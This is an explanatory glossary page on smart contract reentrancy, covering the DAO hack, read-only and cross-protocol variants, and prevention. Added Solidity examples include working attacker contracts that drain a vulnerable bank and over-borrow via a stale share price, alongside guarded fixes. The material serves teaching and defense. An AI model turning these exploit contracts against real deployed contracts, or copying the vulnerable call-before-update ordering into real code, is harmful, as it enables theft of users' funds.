Security

Reentrancy

A vulnerability where a contract can be called again before its first execution completes.

What is Reentrancy?

Reentrancy is a smart contract vulnerability that occurs when a contract makes an external call before updating its internal state, allowing the called contract to re-enter and execute the vulnerable function again before the first call completes. This recursive calling can drain funds or corrupt state by exploiting the gap between the external call and the state update. It is one of the most dangerous and most common vulnerability patterns in smart contracts.

The Classic Reentrancy Attack

The infamous DAO hack of 2016 exploited reentrancy, changing blockchain history forever. The vulnerable pattern: check balance, send ETH to user, then update balance. When sending ETH, the recipient's fallback function (in current Solidity, receive or fallback) could call back into the withdrawal function. Since the balance was not yet updated, the check passed again, allowing multiple withdrawals of the same funds in a single transaction.

This attack drained approximately 3.6 million ETH (around $50 million at the time) and ultimately led to the contentious Ethereum/Ethereum Classic chain split as the community debated whether to reverse the theft.
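The pattern described above, as an added example that is not part of the original page or of the DAO's code: a minimal bank that sends ETH before zeroing the balance, and an attacker contract whose receive() re-enters withdraw() while the bank still records the original balance. Contract names and the 1 ether amounts are constructed for illustration.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Constructed example: a bank that follows the DAO-era order
// (check, interact, then update). Not code from the page or any project.
contract VulnerableBank {
    mapping(address => uint256) public balances;

    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }

    function withdraw() external {
        uint256 amount = balances[msg.sender];
        require(amount > 0, "nothing to withdraw");       // check

        // Interaction BEFORE effect: control passes to msg.sender while
        // balances[msg.sender] still holds the old value.
        (bool ok, ) = msg.sender.call{value: amount}("");  // interaction
        require(ok, "transfer failed");

        balances[msg.sender] = 0;                         // effect (too late)
    }
}

// Attacker: deposits 1 ether, then withdraws. Every incoming payment
// re-enters withdraw() before the bank has zeroed the attacker's balance,
// so each nested call passes the check and pays out 1 ether again.
contract Attacker {
    VulnerableBank public immutable bank;

    constructor(VulnerableBank _bank) {
        bank = _bank;
    }

    function attack() external payable {
        require(msg.value == 1 ether, "send exactly 1 ether");
        bank.deposit{value: 1 ether}();
        bank.withdraw();
    }

    // Invoked by the bank's call{value: ...}("") on each withdrawal.
    receive() external payable {
        // Keep re-entering until the bank cannot fund another full round.
        if (address(bank).balance >= 1 ether) {
            bank.withdraw();
        }
    }

    function drained() external view returns (uint256) {
        return address(this).balance;
    }
}
```

Because the bank forwards all remaining gas with call, the recursion is bounded only by the bank's balance (and the EVM call-depth and gas limits); once the stack unwinds, each frame sets the balance to 0 and the transaction succeeds, with the bank emptied.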

Reentrancy Patterns

Beyond simple ETH transfers, reentrancy can occur through any external call: token standards with transfer hooks (ERC-777, which is ERC-20 compatible but notifies sender and recipient contracts on every transfer), ERC-721 NFT transfers with onERC721Received callbacks, or any explicit contract call. Cross-function reentrancy exploits shared state across multiple functions in the same contract: the re-entered function is a different one from the function that made the external call. Read-only reentrancy does not modify the vulnerable contract at all; it exploits a view function that reports inconsistent state while an external call is in flight, so that another contract (a lending protocol or oracle consumer) acts on a stale reading.

Modern attacks have become sophisticated. Cross-protocol reentrancy exploits composability: contract A calls protocol B, which triggers a callback into contract A in an unexpected intermediate state. View function reentrancy can manipulate oracle readings or share price calculations mid-execution, affecting pricing in every other contract that reads that view during the same transaction, even when the pool itself is protected by a reentrancy guard.
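The read-only and cross-protocol cases above, as an added example that is not code from the page or from any protocol: a share-based ETH pool whose state-changing functions are guarded by a mutex, a lender that values collateral with the pool's unguarded sharePrice() view, and an attacker that borrows from the callback. Contract names, the 50% loan-to-value ratio and the deposit amounts are constructed assumptions.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Constructed example (not code from the page). The pool's redeem() is
// mutex-protected, yet its view function reports an inflated price while
// the redeem callback is running, and a second contract trusts that view.
contract SharePool {
    uint256 public totalShares;
    uint256 public reserve;                       // ETH the pool believes it holds
    mapping(address => uint256) public shares;
    bool private locked;

    modifier nonReentrant() {
        require(!locked, "reentrant");
        locked = true;
        _;
        locked = false;
    }

    function deposit() external payable nonReentrant {
        uint256 minted = totalShares == 0
            ? msg.value
            : msg.value * totalShares / reserve;
        shares[msg.sender] += minted;
        totalShares += minted;
        reserve += msg.value;
    }

    // Unguarded view: any contract may read it, including mid-redeem().
    function sharePrice() public view returns (uint256) {
        return totalShares == 0 ? 1e18 : reserve * 1e18 / totalShares;
    }

    function redeem(uint256 amount) external nonReentrant {
        require(shares[msg.sender] >= amount, "insufficient shares");
        uint256 payout = amount * reserve / totalShares;
        shares[msg.sender] -= amount;
        totalShares -= amount;                              // supply reduced ...
        (bool ok, ) = msg.sender.call{value: payout}("");  // ... callback runs here ...
        require(ok, "transfer failed");
        reserve -= payout;                                  // ... reserve reduced only afterwards
    }
}

// Lends ETH against a user's pool shares at 50% loan-to-value, valued by sharePrice().
contract ShareLender {
    SharePool public immutable pool;
    mapping(address => uint256) public debt;

    constructor(SharePool _pool) payable {
        pool = _pool;
    }

    function maxBorrow(address user) public view returns (uint256) {
        return pool.shares(user) * pool.sharePrice() / 1e18 / 2;
    }

    function borrow(uint256 amount) external {
        require(debt[msg.sender] + amount <= maxBorrow(msg.sender), "exceeds collateral");
        debt[msg.sender] += amount;
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "transfer failed");
    }
}

contract ReadOnlyAttacker {
    SharePool public immutable pool;
    ShareLender public immutable lender;
    uint256 public priceDuringCallback;

    constructor(SharePool _pool, ShareLender _lender) {
        pool = _pool;
        lender = _lender;
    }

    // Deposit, then redeem 80% of the shares; the callback borrows against
    // the remaining 20% while sharePrice() is stale.
    function attack() external payable {
        pool.deposit{value: msg.value}();
        uint256 held = pool.shares(address(this));
        pool.redeem(held * 4 / 5);
    }

    receive() external payable {
        if (msg.sender == address(pool)) {
            priceDuringCallback = pool.sharePrice();          // inflated
            lender.borrow(lender.maxBorrow(address(this)));   // over-borrow
        }
    }
}
```

With an honest depositor holding 5 ether of shares and the attacker depositing 5 ether, redeeming 4e18 shares leaves totalShares at 6e18 while reserve is still 10 ether during the callback, so sharePrice() reports about 1.67 ether per share instead of 1 ether, and maxBorrow for the attacker's remaining 1e18 shares is 0.83 ether instead of 0.5 ether. The pool's mutex never fires because nothing re-enters redeem(); the fix is to have sharePrice() revert while the lock is held, or to update reserve before the external call.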

Prevention Techniques

The checks-effects-interactions pattern is the primary defense: perform all checks, update all state (effects), then make external calls (interactions). This ensures any re-entry finds already-updated state reflecting the operation in progress.

Reentrancy guards (mutexes) prevent any re-entry during function execution by using a state variable lock. OpenZeppelin's ReentrancyGuard is widely used. Note that a guard only protects the functions of the contract that carries it: it does not stop a callback from reading an unguarded view function or from re-entering a different protocol, so checks-effects-interactions is still needed alongside it. Pull-over-push patterns let users withdraw funds themselves rather than having contracts push funds to recipients, which keeps the external call out of the business logic that changes state.
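The three defenses above combined, as an added example that is not code from the page or from OpenZeppelin: a small mutex equivalent to ReentrancyGuard, a withdraw() that follows checks-effects-interactions, and an auction that queues refunds for outbid bidders to pull rather than pushing ETH to them. Contract names are constructed for illustration.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Constructed example (not code from the page). The Mutex below is the same
// idea as OpenZeppelin's ReentrancyGuard; use the library in real code.
abstract contract Mutex {
    uint256 private constant NOT_ENTERED = 1;
    uint256 private constant ENTERED = 2;
    uint256 private status = NOT_ENTERED;

    modifier nonReentrant() {
        require(status == NOT_ENTERED, "reentrant call");
        status = ENTERED;
        _;
        status = NOT_ENTERED;
    }
}

contract SafeBank is Mutex {
    mapping(address => uint256) public balances;

    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }

    // Checks-effects-interactions: the balance is zeroed before any ETH
    // leaves, so a re-entrant call reads 0 and fails the check. The mutex
    // is belt-and-braces: it rejects the re-entry before the check runs.
    function withdraw() external nonReentrant {
        uint256 amount = balances[msg.sender];
        require(amount > 0, "nothing to withdraw");         // check
        balances[msg.sender] = 0;                           // effect
        (bool ok, ) = msg.sender.call{value: amount}("");  // interaction
        require(ok, "transfer failed");
    }
}

// Pull-over-push: bid() never sends ETH to the outbid party, so no
// attacker-controlled code runs inside bid(). Refunds are claimed separately.
contract PullAuction is Mutex {
    address public highestBidder;
    uint256 public highestBid;
    mapping(address => uint256) public refunds;

    function bid() external payable {
        require(msg.value > highestBid, "bid too low");
        if (highestBidder != address(0)) {
            // The push version would be
            //   payable(highestBidder).call{value: highestBid}("")
            // which hands control to the outbid bidder mid-bid(). Queue instead.
            refunds[highestBidder] += highestBid;
        }
        highestBidder = msg.sender;
        highestBid = msg.value;
    }

    function withdrawRefund() external nonReentrant {
        uint256 amount = refunds[msg.sender];
        require(amount > 0, "nothing to withdraw");         // check
        refunds[msg.sender] = 0;                            // effect
        (bool ok, ) = msg.sender.call{value: amount}("");  // interaction
        require(ok, "transfer failed");
    }
}
```

Pulling also prevents a denial of service that push payments invite: a malicious highest bidder whose receive() reverts would otherwise block every later bid.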

Examples

  • The 2016 DAO hack exploited reentrancy to drain 3.6 million ETH through recursive withdrawal calls
